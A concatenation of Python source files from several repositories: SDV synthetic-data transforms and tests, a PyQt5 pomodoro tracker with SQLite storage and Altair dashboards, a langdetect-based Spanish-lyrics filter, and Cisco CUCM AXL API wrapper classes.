def _inverse_transform_continuous(self, column_transform_info, column_data, sigmas, st):
gm = column_transform_info.transform
data = pd.DataFrame(column_data[:, :2], columns=list(gm.get_output_types()))
data.iloc[:, 1] = np.argmax(column_data[:, 1:], axis=1)
if sigmas is not None:
selected_normalized_value = np.random.normal(data.iloc[:, 0], sigmas[st])
data.iloc[:, 0] = selected_normalized_value
return gm.reverse_transform(data, [column_transform_info.column_name])
def _inverse_transform_discrete(self, column_transform_info, column_data):
ohe = column_transform_info.transform
data = pd.DataFrame(column_data, columns=list(ohe.get_output_types()))
return ohe.reverse_transform(data)[column_transform_info.column_name]
def inverse_transform(self, data, sigmas=None):
"""Take matrix data and output raw data.
Output uses the same type as input to the transform function.
Either np array or pd dataframe.
"""
st = 0
recovered_column_data_list = []
column_names = []
for column_transform_info in self._column_transform_info_list:
dim = column_transform_info.output_dimensions
column_data = data[:, st:st + dim]
if column_transform_info.column_type == 'continuous':
recovered_column_data = self._inverse_transform_continuous(
column_transform_info, column_data, sigmas, st)
else:
recovered_column_data = self._inverse_transform_discrete(
column_transform_info, column_data)
recovered_column_data_list.append(recovered_column_data)
column_names.append(column_transform_info.column_name)
st += dim
recovered_data = np.column_stack(recovered_column_data_list)
recovered_data = (pd.DataFrame(recovered_data, columns=column_names)
.astype(self._column_raw_dtypes))
if not self.dataframe:
recovered_data = recovered_data.to_numpy()
return recovered_data
def convert_column_name_value_to_id(self, column_name, value):
"""Get the ids of the given `column_name`."""
discrete_counter = 0
column_id = 0
for column_transform_info in self._column_transform_info_list:
if column_transform_info.column_name == column_name:
break
if column_transform_info.column_type == 'discrete':
discrete_counter += 1
column_id += 1
else:
raise ValueError(f"The column_name `{column_name}` doesn't exist in the data.")
ohe = column_transform_info.transform
data = pd.DataFrame([value], columns=[column_transform_info.column_name])
one_hot = ohe.transform(data).to_numpy()[0]
if sum(one_hot) == 0:
raise ValueError(f"The value `{value}` doesn't exist in the column `{column_name}`.")
return {
'discrete_column_id': discrete_counter,
'column_id': column_id,
'value_id': np.argmax(one_hot)
}
``` |
{
"source": "JonathanDZiegler/SDV",
"score": 3
} |
#### File: SDV/sdv/sdv.py
```python
import pickle
import warnings
from sdv.errors import NotFittedError
from sdv.relational.hma import HMA1
from sdv.tabular.copulas import GaussianCopula
from sdv.utils import get_package_versions, throw_version_mismatch_warning
class SDV:
"""Automated generative modeling and sampling tool.
Allows the users to generate synthetic data after creating generative models for their data.
Args:
model (type):
Class of the model to use. Defaults to ``sdv.relational.HMA1``.
model_kwargs (dict):
Keyword arguments to pass to the model. If no ``model`` is given,
this defaults to using a ``GaussianCopula`` with ``gaussian`` distribution
and ``categorical_fuzzy`` categorical transformer.
"""
_model_instance = None
DEFAULT_MODEL = HMA1
DEFAULT_MODEL_KWARGS = {
'model': GaussianCopula,
'model_kwargs': {
'default_distribution': 'gaussian',
'categorical_transformer': 'categorical_fuzzy',
}
}
def __init__(self, model=None, model_kwargs=None):
if model is None:
model = model or self.DEFAULT_MODEL
if model_kwargs is None:
model_kwargs = self.DEFAULT_MODEL_KWARGS
self._model = model
self._model_kwargs = (model_kwargs or dict()).copy()
def fit(self, metadata, tables=None, root_path=None):
"""Fit this SDV instance to the dataset data.
Args:
metadata (dict, str or Metadata):
Metadata dict, path to the metadata JSON file or Metadata instance itself.
tables (dict):
Dictionary with the table names as key and ``pandas.DataFrame`` instances as
values. If ``None`` is given, the tables will be loaded from the paths
indicated in ``metadata``. Defaults to ``None``.
root_path (str or None):
Path to the dataset directory. If ``None`` and metadata is
a path, the metadata location is used. If ``None`` and
metadata is a dict, the current working directory is used.
"""
self._model_instance = self._model(metadata, root_path, **self._model_kwargs)
self._model_instance.fit(tables)
def sample(self, table_name=None, num_rows=None,
sample_children=True, reset_primary_keys=False):
"""Generate synthetic data for one table or the entire dataset.
If a ``table_name`` is given and ``sample_children`` is ``False``, a
``pandas.DataFrame`` with the values from the indicated table is returned.
Otherwise, if ``sample_children`` is ``True``, a dictionary containing both
the table and all its descendant tables is returned.
If no ``table_name`` is given, the entire dataset is sampled and returned
in a dictionary.
If ``num_rows`` is given, the root tables of the dataset will contain the
indicated number of rows. Otherwise, the number of rows will be the same
as in the original dataset. Number of rows in the child tables cannot be
controlled and always will depend on the values from the sampled parent
tables.
If ``reset_primary_keys`` is ``True``, the primary key generators will be
reset.
Args:
table_name (str):
Name of the table to sample from. If not passed, sample the entire
dataset.
num_rows (int):
Amount of rows to sample. If ``None``, sample the same number of rows
as there were in the original table.
sample_children (bool):
Whether or not sample child tables. Used only if ``table_name`` is
given. Defaults to ``True``.
reset_primary_keys (bool):
Whether or not reset the primary keys generators. Defaults to ``False``.
Returns:
dict or pandas.DataFrame:
- Returns a ``dict`` when ``sample_children`` is ``True`` with the sampled table
and child tables.
- Returns a ``pandas.DataFrame`` when ``sample_children`` is ``False``.
Raises:
NotFittedError:
A ``NotFittedError`` is raised when the ``SDV`` instance has not been fitted yet.
"""
if self._model_instance is None:
raise NotFittedError('SDV instance has not been fitted')
return self._model_instance.sample(
table_name,
num_rows,
sample_children=sample_children,
reset_primary_keys=reset_primary_keys
)
def sample_all(self, num_rows=None, reset_primary_keys=False):
"""Sample the entire dataset.
WARNING: This method is deprecated and will be removed in future relaeses. Please
use the ``sample`` method instead.
Args:
num_rows (int):
Number of rows to be sampled on the first parent tables. If ``None``,
sample the same number of rows as in the original tables.
reset_primary_keys (bool):
Wheter or not reset the primary key generators. Defaults to ``False``.
Returns:
dict:
Tables sampled.
Raises:
NotFittedError:
A ``NotFittedError`` is raised when the ``SDV`` instance has not been fitted yet.
"""
warnings.warn('`sample_all` is deprecated and will be removed soon. Please use `sample`',
DeprecationWarning)
return self.sample(num_rows=num_rows, reset_primary_keys=reset_primary_keys)
def save(self, path):
"""Save this SDV instance to the given path using pickle.
Args:
path (str):
Path where the SDV instance will be serialized.
"""
self._package_versions = get_package_versions(getattr(self, '_model', None))
with open(path, 'wb') as output:
pickle.dump(self, output)
@classmethod
def load(cls, path):
"""Load a SDV instance from a given path.
Args:
path (str):
Path from which to load the SDV instance.
"""
with open(path, 'rb') as f:
model = pickle.load(f)
throw_version_mismatch_warning(getattr(model, '_package_versions', None))
return model
```
#### File: unit/lite/test_tabular.py
```python
import io
from unittest.mock import Mock, patch
import numpy as np
import pandas as pd
import pytest
from sdv.lite import TabularPreset
from sdv.tabular import GaussianCopula
from tests.utils import DataFrameMatcher
class TestTabularPreset:
def test___init__missing_optimize_for(self):
"""Test the ``TabularPreset.__init__`` method with no parameters.
Side Effects:
- ValueError should be thrown
"""
# Run and Assert
with pytest.raises(
ValueError,
match=('You must provide the name of a preset using the `optimize_for` parameter. '
r'Use `TabularPreset.list_available_presets\(\)` to browse through '
'the options.')):
TabularPreset()
def test___init__invalid_optimize_for(self):
"""Test the ``TabularPreset.__init__`` method with an invalid arg value.
Input:
- optimize_for = invalid parameter
Side Effects:
- ValueError should be thrown
"""
# Run and Assert
with pytest.raises(ValueError, match=r'`optimize_for` must be one of *'):
TabularPreset(optimize_for='invalid')
@patch('sdv.lite.tabular.GaussianCopula', spec_set=GaussianCopula)
def test__init__speed_passes_correct_parameters(self, gaussian_copula_mock):
"""Tests the ``TabularPreset.__init__`` method with the speed preset.
The method should pass the parameters to the ``GaussianCopula`` class.
Input:
- optimize_for = speed
Side Effects:
- GaussianCopula should receive the correct parameters
"""
# Run
TabularPreset(optimize_for='SPEED')
# Assert
gaussian_copula_mock.assert_called_once_with(
table_metadata=None,
categorical_transformer='label_encoding',
default_distribution='gaussian',
rounding=None,
)
metadata = gaussian_copula_mock.return_value._metadata
assert metadata._dtype_transformers.update.call_count == 1
def test_fit(self):
"""Test the ``TabularPreset.fit`` method.
Expect that the model's fit method is called with the expected args.
Input:
- fit data
Side Effects:
- The model's fit method is called with the same data.
"""
# Setup
metadata = Mock()
metadata.to_dict.return_value = {'fields': {}}
model = Mock()
model._metadata = metadata
preset = Mock()
preset._model = model
preset._null_percentages = None
# Run
TabularPreset.fit(preset, pd.DataFrame())
# Assert
model.fit.assert_called_once_with(DataFrameMatcher(pd.DataFrame()))
assert preset._null_percentages == {}
def test_fit_with_null_values(self):
"""Test the ``TabularPreset.fit`` method with null values.
Expect that the model's fit method is called with the expected args, and that
the null percentage is calculated correctly.
Input:
- fit data
Side Effects:
- The model's fit method is called with the same data.
"""
# Setup
metadata = Mock()
metadata.to_dict.return_value = {'fields': {'a': {}}}
model = Mock()
model._metadata = metadata
preset = Mock()
preset._model = model
preset._null_percentages = None
data = {'a': [1, 2, np.nan]}
# Run
TabularPreset.fit(preset, pd.DataFrame(data))
# Assert
model.fit.assert_called_once_with(DataFrameMatcher(pd.DataFrame(data)))
assert preset._null_percentages == {'a': 1.0 / 3}
def test_sample(self):
"""Test the ``TabularPreset.sample`` method.
Expect that the model's sample method is called with the expected args.
Input:
- num_rows=5
Side Effects:
- The model's sample method is called with the same data.
"""
# Setup
model = Mock()
preset = Mock()
preset._model = model
preset._null_percentages = None
# Run
TabularPreset.sample(preset, 5)
# Assert
model.sample.assert_called_once_with(5)
def test_sample_with_null_values(self):
"""Test the ``TabularPreset.sample`` method with null percentages.
Expect that the model's sample method is called with the expected args, and that
null values are inserted back into the sampled data.
Input:
- num_rows=5
Side Effects:
- The model's sample method is called with the expected number of rows.
"""
# Setup
model = Mock()
model.sample.return_value = pd.DataFrame({'a': [1, 2, 3, 4, 5]})
preset = Mock()
preset._model = model
# Convoluted example - 100% percent chance of nulls to make test deterministic.
preset._null_percentages = {'a': 1}
# Run
sampled = TabularPreset.sample(preset, 5)
# Assert
model.sample.assert_called_once_with(5)
assert sampled['a'].isna().sum() == 5
def test_list_available_presets(self):
"""Tests the ``TabularPreset.list_available_presets`` method.
This method should print all the available presets.
Side Effects:
- The available presets should be printed.
"""
# Setup
out = io.StringIO()
expected = ('Available presets:\n{\'SPEED\': \'Use this preset to minimize the time '
'needed to create a synthetic data model.\'}\n\nSupply the desired '
'preset using the `opimize_for` parameter.\n\nHave any requests for '
'custom presets? Contact the SDV team to learn more an SDV Premium license.')
# Run
TabularPreset(optimize_for='SPEED').list_available_presets(out)
# Assert
assert out.getvalue().strip() == expected
``` |
{
"source": "JonathanElejalde/pomodoro",
"score": 4
} |
#### File: pomodoro/console/database.py
```python
def create_database(cursor):
# Make some fresh tables using executescript()
cursor.executescript(
"""
CREATE TABLE IF NOT EXISTS Pomodoros (
id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,
time INTEGER NOT NULL,
date TEXT,
hour TEXT,
category_id INTEGER,
project_id INTEGER,
satisfaction INTEGER NOT NULL
);
CREATE TABLE IF NOT EXISTS Projects (
id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,
name TEXT,
start TEXT,
end TEXT,
category_id,
canceled TEXT DEFAULT "No"
);
CREATE TABLE IF NOT EXISTS Categories (
id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,
category TEXT
);
"""
)
if __name__ == "__main__":
import sqlite3
import os
# --CREATING THE DATABASE--
os.chdir("..") # Go up one directory from working directory
conn = sqlite3.connect("data\pomodoros.db")
cursor = conn.cursor()
# This will run if the database is not created already
create_database(cursor)
```
#### File: pomodoro/console/pyqt5_app.py
```python
import sys
import winsound
import time
from functools import partial
from queries import Pomodoro
from PomodoroUI import PomodoroUI
from RecallsUI import Recalls
from PyQt5.QtWidgets import (
QApplication,
QMainWindow,
QPushButton,
QMessageBox,
)
from PyQt5 import QtGui, QtWidgets
from PyQt5.QtCore import Qt, QThread, pyqtSignal
# Todo's
# Pointing to the same database
# Add docstring
# try to improve the code
class MainPomodoro:
def __init__(self):
# Interface
self.main_window = QMainWindow()
self.pomodoro_ui = PomodoroUI()
self.pomodoro_ui.setupUi(self.main_window)
self.recall_window = QtWidgets.QWidget()
self.recall_ui = Recalls()
self.recall_ui.setupUi(self.recall_window)
# Query manager
self.pomodoro_manager = Pomodoro()
# Track variables for queries and confirmation purposes
self.category_id = None
self.project_id = None
self.project_name = None
self.satisfaction = None
##### Buttons ######
# Start the app in home
self.pomodoro_ui.stacked_widget.setCurrentWidget(self.pomodoro_ui.home)
self.pomodoro_ui.create_pomodoro_btn.clicked.connect(
self.show_categories)
self.pomodoro_ui.start_pomodoro_btn.clicked.connect(self.start_timer)
# Add new category
self.pomodoro_ui.add_new_cat_btn.clicked.connect(self.add_category)
self.pomodoro_ui.add_proj_btn.clicked.connect(self.add_project)
# End or Cancel a project
self.pomodoro_ui.end_proj_btn.clicked.connect(
lambda x: self.end_project(self.project_id, self.project_name))
self.pomodoro_ui.cancel_proj_btn.clicked.connect(
lambda x: self.cancel_project(self.project_id, self.project_name))
# open a new dialog if clicked add recall
self.pomodoro_ui.add_recall_btn.clicked.connect(self.start_recall)
# Allows to go back
self.pomodoro_ui.previous_window_btn1.clicked.connect(
self.previous_window)
self.pomodoro_ui.previous_window_btn2.clicked.connect(
self.previous_window)
self.pomodoro_ui.previous_window_btn3.clicked.connect(
self.previous_window)
def clear_layout(self, layout):
while layout.count():
child = layout.takeAt(0)
if child.widget():
child.widget().deleteLater()
def show_categories(self):
# Clear layout
self.clear_layout(self.pomodoro_ui.cat_layout)
# Add the categories
font = QtGui.QFont()
font.setPointSize(12)
buttons = dict()
# Get the categories
categories = self.pomodoro_manager.get_categories()
# Add the categories to the interface
for id, category in categories:
buttons[category] = QPushButton(category)
buttons[category].setFont(font)
self.pomodoro_ui.cat_layout.addWidget(buttons[category])
buttons[category].clicked.connect(partial(self.show_projects, id))
self.pomodoro_ui.stacked_widget.setCurrentWidget(
self.pomodoro_ui.categories)
def show_projects(self, category_id):
# Track the category id
self.category_id = category_id
# Clear layout
self.clear_layout(self.pomodoro_ui.proj_layout)
font = QtGui.QFont()
font.setPointSize(12)
# Get the projects
projects = self.pomodoro_manager.get_projects(category_id)
buttons = dict()
# Add the projects to the interface
for i, project in enumerate(projects):
project_id, project_name = project
# add buttons
buttons[project_name] = QPushButton(project_name)
buttons[project_name].setFont(font)
self.pomodoro_ui.proj_layout.addWidget(buttons[project_name])
buttons[project_name].clicked.connect(
partial(self.show_timer, project_id, project_name))
self.pomodoro_ui.stacked_widget.setCurrentWidget(
self.pomodoro_ui.projects)
def show_timer(self, project_id, project_name):
# Track project_id and project_name
self.project_id = project_id
self.project_name = project_name
self.pomodoro_ui.current_proj.setText(project_name)
self.pomodoro_ui.stacked_widget.setCurrentWidget(
self.pomodoro_ui.timer)
def start_timer(self):
self.pomodoro_ui.pomodoro_added_label.setText("")
self.pomodoro_timer = Timer()
self.pomodoro_timer.change_time.connect(self.set_timer)
self.pomodoro_timer.change_label.connect(self.set_label)
self.pomodoro_timer.finished.connect(self.qualify_pomodoro)
self.pomodoro_timer.start()
def start_recall(self):
self.recall_window.show()
def qualify_pomodoro(self):
message = QMessageBox.question(
self.main_window,
"Pomodoro's satisfaction",
"Did you feel good in this pomodoro",
QMessageBox.Yes | QMessageBox.No,
)
if message == QMessageBox.Yes:
self.satisfaction = 1
elif message == QMessageBox.No:
self.satisfaction = 2
# Save the pomodoro into the database
self.pomodoro_manager.add_pomodoro(self.category_id, self.project_id,
self.satisfaction)
self.pomodoro_ui.pomodoro_added_label.setText("The pomodoro was added")
def set_timer(self, time_left):
self.pomodoro_ui.timer_label.setText(time_left)
def set_label(self, label):
self.pomodoro_ui.working_resting_label.setText(label)
def add_category(self):
category = self.pomodoro_ui.new_category_text.text()
self.pomodoro_manager.create_category(category)
# Refresh the category view
self.show_categories()
self.pomodoro_ui.new_category_text.setText("")
def add_project(self):
project = self.pomodoro_ui.new_project_text.text()
self.pomodoro_manager.create_project(project, self.category_id)
# Refresh the project view
self.show_projects(self.category_id)
self.pomodoro_ui.new_project_text.setText("")
def end_project(self, project_id, project_name):
message = QMessageBox.question(
self.main_window,
"End project",
f"Do you want to end project {project_name}",
QMessageBox.Yes | QMessageBox.No,
)
if message == QMessageBox.Yes:
self.pomodoro_manager.end_project(project_id)
self.pomodoro_manager.conn.commit()
# Return to projects
self.show_projects(self.category_id)
def cancel_project(self, project_id, project_name):
message = QMessageBox.question(
self.main_window,
"Cancel project",
f"Do you want to cancel project {project_name}",
QMessageBox.Yes | QMessageBox.No,
)
if message == QMessageBox.Yes:
self.pomodoro_manager.cancel_project(project_id)
self.pomodoro_manager.conn.commit()
# Return to projects
self.show_projects(self.category_id)
def show(self):
self.main_window.show()
def previous_window(self):
self.pomodoro_ui.stacked_widget.setCurrentIndex(
(self.pomodoro_ui.stacked_widget.currentIndex() - 1) % 4)
class Timer(QThread):
_end_sound = "countdown.wav"
change_time = pyqtSignal(str)
change_label = pyqtSignal(str)
def __init__(self, working=25, resting=5):
super().__init__()
self.working = working
self.resting = resting
def run(self):
# Start working timer
working_length = 60 * self.working
label = "Working"
self.change_label.emit(label)
while working_length > 0:
mins, seconds = divmod(working_length, 60)
time_left = str(mins).zfill(2) + ":" + str(seconds).zfill(2)
QThread.sleep(1)
working_length -= 1
self.change_time.emit(time_left)
winsound.PlaySound(self._end_sound, winsound.SND_FILENAME)
# Star resting timer
rest_length = 60 * self.resting
label = "Resting"
self.change_label.emit(label)
while rest_length > 0:
mins, seconds = divmod(rest_length, 60)
time_left = str(mins).zfill(2) + ":" + str(seconds).zfill(2)
QThread.sleep(1)
rest_length -= 1
self.change_time.emit(time_left)
winsound.PlaySound(self._end_sound, winsound.SND_FILENAME)
if __name__ == "__main__":
app = QApplication(sys.argv)
main_win = MainPomodoro()
main_win.show()
sys.exit(app.exec_())
```
#### File: JonathanElejalde/pomodoro/dashboard.py
```python
from altair.vegalite.v4 import schema
from altair.vegalite.v4.schema.channels import Tooltip
import pandas as pd
import altair as alt
import numpy as np
from queries import Pomodoro
THEME = 'magma'
# TO DO: Add docstings where needed
def get_current_date():
"""
Gets the current date to perform default
charts.
returns:
date: tuple. (year, month, day)
"""
date = pd.to_datetime('now')
year = date.year
month = date.month
day = date.day
return (year, month, day)
# POMODORO CHARTS
def monthly_chart(year, month, df):
"""
"""
# Filter
df_copy = df.copy()
filtered = df_copy.loc[f'{year}/{month}']
month_name = filtered.full_date.dt.month_name()
month_name = month_name.iloc[0]
base = alt.Chart(
filtered, title=f'Productivity in {month_name}').mark_circle().encode(
x=alt.X('monthdate(full_date):O',
title='Days',
axis=alt.Axis(labelAngle=-90)),
y=alt.Y('hoursminutes(full_date)', title='Daily hours'),
).properties(width=400, height=200)
stack = base.mark_bar().encode(y=alt.Y('count()', title='Daily pomodoros'),
color=alt.Color('project',
title='Project names'),
tooltip=[
alt.Tooltip('category',
title='Category'),
alt.Tooltip('project',
title='Project name'),
alt.Tooltip('count()',
title='Pomodoros'),
alt.Tooltip(
'sum(pomodoro_length)',
title='Minutes invested this day')
])
scatter = base.encode(color=alt.Color('project', title='Project names'),
tooltip=[
alt.Tooltip('category', title='Category'),
alt.Tooltip('project', title='Project name'),
alt.Tooltip('yearmonthdate(full_date)',
title='Date'),
alt.Tooltip('pomodoro_calification',
title='Satisfaction'),
alt.Tooltip('hoursminutes(full_date)',
title='Start')
],
size=alt.Size('pomodoro_calification',
sort='descending',
title='Calification'))
chart = alt.hconcat(stack, scatter)
return chart
def hourly_chart(df):
"""
"""
df_copy = df.copy()
# Get only the bad pomodoros
bad_condition = df_copy.pomodoro_calification == 'Bad'
bad_df = df_copy[bad_condition]
# Filtered pomodoros without calification
condition = df_copy.pomodoro_calification != 0
new_df = df_copy[condition]
grouped_chart = alt.Chart(new_df).mark_bar().encode(
alt.X('pomodoro_calification:N', title="", axis=None),
alt.Y('count():Q', title='Pomodoro count'),
alt.Column('hours(full_date):O',
title='Good and Bad pomodoros by hour'),
alt.Color('pomodoro_calification:N', title='Calification'),
tooltip=[alt.Tooltip('hours(full_date)'),
alt.Tooltip('count()')]).properties(width=20, height=200)
heatmap = alt.Chart(
bad_df, title='Bad pomodoros by day and hour').mark_rect().encode(
alt.X('hours(full_date)',
title='Hours',
axis=alt.Axis(labelAngle=-90)),
alt.Y('day(full_date):O', title='Day of the week'),
alt.Color('count():Q',
title='Pomodoro count',
scale=alt.Scale(domain=(10, 1), scheme=THEME)),
tooltip=[
alt.Tooltip('count()', title='Bad pomodoros'),
alt.Tooltip('sum(pomodoro_length)', title='Minutes wasted'),
alt.Tooltip('hours(full_date)', title='Hour')
]).properties(width=400, height=200)
return grouped_chart & heatmap
## PROJECT CHARTS
def create_projects_df(df):
"""
"""
df_copy = df.copy()
date_format = '%Y-%m-%d'
tmp_projects = df_copy.groupby('project').agg({
'category':
'first',
'project_start':
'first',
'project_end':
'first',
'project_cancel':
'first',
'pomodoro_date':
'nunique',
'pomodoro_length':
'sum',
'pomodoro_calification':
'count'
})
# Rename the columns resulting from the groupby
project_columns = {
'project_start': 'start',
'project_end': 'end',
'project_cancel': 'cancel',
'pomodoro_date': 'working_days',
'pomodoro_length': 'minutes',
'pomodoro_calification': 'total_pomodoros'
}
tmp_projects.rename(columns=project_columns, inplace=True)
# Create separete columns for the pomodoro califications
tmp_projects_2 = df_copy.groupby(
'project')['pomodoro_calification'].value_counts().unstack().fillna(0)
# Merge the two resulting groupby dataframes
projects = pd.merge(tmp_projects,
tmp_projects_2,
left_index=True,
right_index=True)
# Create the project status column.
conditions = [projects.end.notnull(), projects.cancel.notnull()]
choices = ['Ended', 'Canceled']
projects['status'] = np.select(conditions, choices, default='On')
# Create the days column. It counts the amount of days since its
# start until its end/cancel date or current day if still on.
today = pd.to_datetime("today", format=date_format)
end_mask = (projects.status == "Ended")
cancel_mask = (projects.status == 'Canceled')
on_mask = (projects.status == 'On')
projects['days'] = 0
projects.loc[end_mask, 'days'] = (projects.end - projects.start).dt.days
projects.loc[cancel_mask,
'days'] = (projects.cancel - projects.start).dt.days
projects.loc[on_mask, 'days'] = (today - projects.start).dt.days
# Convert the minutes count into hours
projects['hours'] = pd.to_datetime(projects.minutes,
unit='m').dt.strftime('%H:%M')
# Convert the minutes column to amount of pomodoros
projects['pomodoros'] = projects.minutes / 25
projects.reset_index(inplace=True)
return projects
def projects_hours_days(df):
"""
"""
df_copy = df.copy()
single = alt.selection_single()
chart = alt.Chart(
df_copy, title='Projects').mark_point(filled=True).encode(
alt.X('yearmonthdate(start)', title="Project starting date"),
alt.Y('days', title='Days since the start'),
color=alt.Color(
'status:N',
title='Project current status',
sort='descending',
),
size=alt.Size('hours',
title='Total hours invested in the project'),
tooltip=[
alt.Tooltip('category', title='Category'),
alt.Tooltip('project', title='Project'),
alt.Tooltip('start', title='Project starting date'),
alt.Tooltip('status', title='Status'),
alt.Tooltip('days', title='Days since the start'),
alt.Tooltip('working_days',
title='Days with at least 1 pomodoro'),
alt.Tooltip('hours', title='Total hours invested'),
alt.Tooltip('pomodoros', title='Amount of pomodoros made')
]).add_selection(single).properties(width=800).interactive()
return chart
# Make possible to show various plojects
def plot_project(project, df):
"""
"""
df_copy = df.copy()
# Filterer the project
filtered = df_copy[df_copy.project == project]
# Get start and end dates
row = filtered.iloc[0]
start = row.project_start
end = row.project_end
cancel = row.project_cancel
start = start.date()
if end:
last = end.date()
elif cancel:
last = cancel.date()
else:
today = pd.to_datetime("today")
last = today.date()
line = alt.Chart(filtered).mark_bar().encode(
alt.X(
'yearmonthdate(full_date):O',
# scale=alt.Scale(
# domain=[start.isoformat(), last.isoformat()]),
axis=alt.Axis(labelAngle=-90)),
alt.Y('count()')).configure_range(category={'scheme': 'dark2'})
return line
def my_theme():
return {
'config': {
'view': {
'continuousHeight': 300,
'continuousWidth': 400
}, # from the default theme
'range': {
'category': {
'scheme': THEME
}
}
}
}
# Altair theme
alt.themes.register('my_theme', my_theme)
alt.themes.enable('my_theme')
if __name__ == "__main__":
pomodoro = Pomodoro()
df = pomodoro.create_df(pomodoro.QUERY)
project = 'El asesinato de <NAME> - <NAME>'
filtered = plot_project(project, df)
``` |
{
"source": "JonathanElejalde/reggaeton_songs_nlp",
"score": 3
} |
#### File: reggaeton_songs_nlp/preprocessing/detect_language.py
```python
import pandas as pd
import langdetect
from langdetect import DetectorFactory
# Set the seed of the langdetect to reproducible results
detector_factory_seed = 10
DetectorFactory.seed = detector_factory_seed
def get_lang_probability(lang_prob):
"""
Takes a string with the format lang:probability and returns
a tuple (lang, probability)
Args:
lang_prob: str
"""
lang, probability = lang_prob.split(":")
try:
probability = float(probability)
except Exception as e:
print("Cound not convert probability to float")
print(e)
return (lang, probability)
def detect_songs_language(song_lyrics):
"""
Takes the lyrics of a song and returns
the languages that it has and the probabilities
in a list of tuples
Args:
song_lyrics: str
returns:
lang_probs = list of tuples (lang, probability)
"""
try:
probs = langdetect.detect_langs(song_lyrics)
lang_probs = list()
for prob in probs:
str_lang_prob = str(prob)
lang_prob = get_lang_probability(str_lang_prob)
lang_probs.append(lang_prob)
return lang_probs
except Exception as e:
print(e)
# if error return no english language
# to delete that particular song
lang_probs = [("en", 0.9)]
return lang_probs
def delete_rows(df, rows):
"""
It takes a dataframe and deletes the rows by index.
Then it returns the resulting dataframe
Args:
df: pandas dataframe
rows: list. list of indexes
returns:
df: pandas dataframe
"""
df_len = len(df)
print(f"The dataframe started with {df_len} rows")
df = df.drop(index=rows)
df_len = len(df)
print(f"The dataframe ended with {df_len} rows")
return df
def update_lyrics(lyrics):
"""
Takes the lyrics of a song, splits it into
paragraphs and detects the language of each
paragraph. Finally joins the paragraphs that
are in spanish
Args:
lyrics: str
returns:
lyrics: str. The updated version of the song
with just spanish
"""
paragraphs = lyrics.split("\r\n\r\n")
updated_lyrics = list()
paragraphs_deleted = 0
for paragraph in paragraphs:
paragraph_lang = detect_songs_language(paragraph)
# If the paragraph has more than one language skip it
if len(paragraph_lang) > 1:
paragraphs_deleted += 1
continue
lang, prob = paragraph_lang[0]
if lang == "es":
updated_lyrics.append(paragraph)
else:
paragraphs_deleted += 1
lyrics = "\r\n\r\n".join(updated_lyrics)
return lyrics
def delete_no_spanish(df, lang_threshold):
"""
Takes the songs dataframe and detects the lyrics
language. If the lyrics is completely in spanish
keep it, if it is a combination but the first
language is spanish (over the lang_threshold) delete the
non-spanish parts. Otherwise options delete the lyrics
Args:
df: pandas dataframe
lang_threshold: float
returns:
updated_df: pandas dataframe
"""
delete_songs_index = list()
no_complete_spanish_index = list()
deleted_songs_count = 0
no_spanish_count = 0
for index, lyrics in df.lyrics.iteritems():
lang_probs = detect_songs_language(lyrics)
# If true it means the song has more than one language
if len(lang_probs) > 1:
# the first entry is the language with the highest probability
lang, prob = lang_probs[0]
if (lang == "es") and (prob > lang_threshold):
no_complete_spanish_index.append(index)
no_spanish_count += 1
else:
deleted_songs_count += 1
delete_songs_index.append(index)
# If just one language check for spanish
else:
lang, prob = lang_probs[0]
if lang != "es":
delete_songs_index.append(index)
deleted_songs_count += 1
# Clean the lyrics that are not entirely in spanish
for index in no_complete_spanish_index:
lyrics = df.iloc[index].lyrics
new_lyrics = update_lyrics(lyrics)
# change the lyrics in the dataframe
df.at[index, "lyrics"] = new_lyrics
# Delete non-spanish songs
updated_df = delete_rows(df, delete_songs_index)
print(f"Amount of songs deleted: {deleted_songs_count}")
print(f"Amount of no-complete spanish: {no_spanish_count}")
return updated_df
if __name__ == "__main__":
pass
# data_path = "..\data\lyrics_labeled.csv"
# lang_threshold = 0.80
# songs = pd.read_csv(data_path)
# prueba = songs[:200]
# songs_updated = delete_no_spanish(prueba, lang_threshold)
# songs_updated.to_csv("..\data\only_spanish_lyrics.csv", index=False)
``` |
{
"source": "jonathanelscpt/ciscocucmapi",
"score": 2
} |
#### File: ciscocucmapi/api/advanced.py
```python
from operator import methodcaller
from zeep.helpers import serialize_object
from .._internal_utils import flatten_signature_kwargs
from ..helpers import get_model_dict
from .base import DeviceAXLAPI
from .base import SimpleAXLAPI
class CalledPartyTracing(SimpleAXLAPI):
_factory_descriptor = "called_party_tracing"
supported_methods = ["add", "list", "remove"]
def add(self, directorynumber, **kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class DirNumberAliasLookupandSync(SimpleAXLAPI):
_factory_descriptor = "directory_number_alias_sync"
def add(self, ldapConfigName, ldapManagerDisgName, ldapPassword, ldapUserSearch, servers,
ldapDirectoryServerUsage="DirSync", enableCachingofRecords=False, sipAliasSuffix=None,
keepAliveSearch=None, keepAliveTime=5, **kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class IlsConfig(SimpleAXLAPI):
_factory_descriptor = "ils_config"
supported_methods = ["get", "update"]
def __init__(self, connector, object_factory):
super().__init__(connector, object_factory)
self._get_model_name = "NewIlsConfig"
def get(self, clusterId, returnedTags=None, **kwargs):
if not returnedTags:
get_model = self._get_wsdl_obj(self._get_model_name)
returnedTags = get_model_dict(get_model)
return super().get(clusterId=clusterId, returnedTags=returnedTags, **kwargs)
class MessageWaiting(SimpleAXLAPI):
_factory_descriptor = "mwi_number"
def add(self, pattern, routePartitionName=None, callingSearchSpaceName=None, messageWaitingIndicator=False,
**kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class RemoteCluster(SimpleAXLAPI):
_factory_descriptor = "remote_cluster"
supported_methods = ["model", "create", "add", "get", "update", "list", "remove", "do_update"]
def add(self, clusterId, fullyQualifiedName, emcc=None, pstnAccess=None, rsvpAgent=None, tftp=None, lbm=None,
uds=None, **kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
def do_update(self, clusterId, server):
kwargs = {
"clusterId": clusterId,
"server": server
}
options_method = methodcaller("".join(["doUpdate", self.__class__.__name__]), **kwargs)
axl_resp = options_method(self.connector.service)
return self.object_factory(
"".join([self.__class__.__name__]),
serialize_object(axl_resp)["return"])
class SecureConfig(SimpleAXLAPI):
_factory_descriptor = "secure_config"
